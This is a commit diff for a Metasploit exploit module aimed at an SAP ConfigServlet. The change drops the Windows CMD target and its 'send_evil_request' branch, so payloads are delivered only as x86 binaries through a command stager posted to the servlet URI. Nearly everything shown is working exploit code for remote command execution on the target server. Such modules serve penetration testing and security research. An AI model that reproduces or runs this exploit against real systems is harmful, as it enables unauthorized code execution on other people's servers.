allow only ARCH_X86 payloads
parent
750638e4d6
commit
783cca6c17
|
@ -26,15 +26,9 @@ class Metasploit3 < Msf::Exploit
|
|||
'Targets' =>
|
||||
[
|
||||
[
|
||||
'Windows CMD (Use windows CMD payloads)',
|
||||
'Windows generic',
|
||||
{
|
||||
'Arch' => ARCH_CMD
|
||||
}
|
||||
],
|
||||
[
|
||||
'Windows x86 (Execute binary payloads via uploaded VBS)',
|
||||
{
|
||||
'Arch' => ARCH_X86 #badchars ,;
|
||||
'Arch' => ARCH_X86
|
||||
}
|
||||
]
|
||||
],
|
||||
|
@ -53,11 +47,7 @@ class Metasploit3 < Msf::Exploit
|
|||
print_status("#{rhost}:#{rport} - Exploiting remote system")
|
||||
uri = normalize_uri(target_uri.path, 'ConfigServlet')
|
||||
|
||||
if target['Arch'] == ARCH_CMD
|
||||
send_evil_request(uri, payload.encoded)
|
||||
else
|
||||
execute_cmdstager( { :linemax => 1500, :nodelete => true, :sap_configservlet_uri => uri })
|
||||
end
|
||||
execute_cmdstager( { :linemax => 1500, :nodelete => true, :sap_configservlet_uri => uri })
|
||||
end
|
||||
|
||||
def execute_command(cmd, opts)
|
||||
|
|
Loading…
Reference in New Issue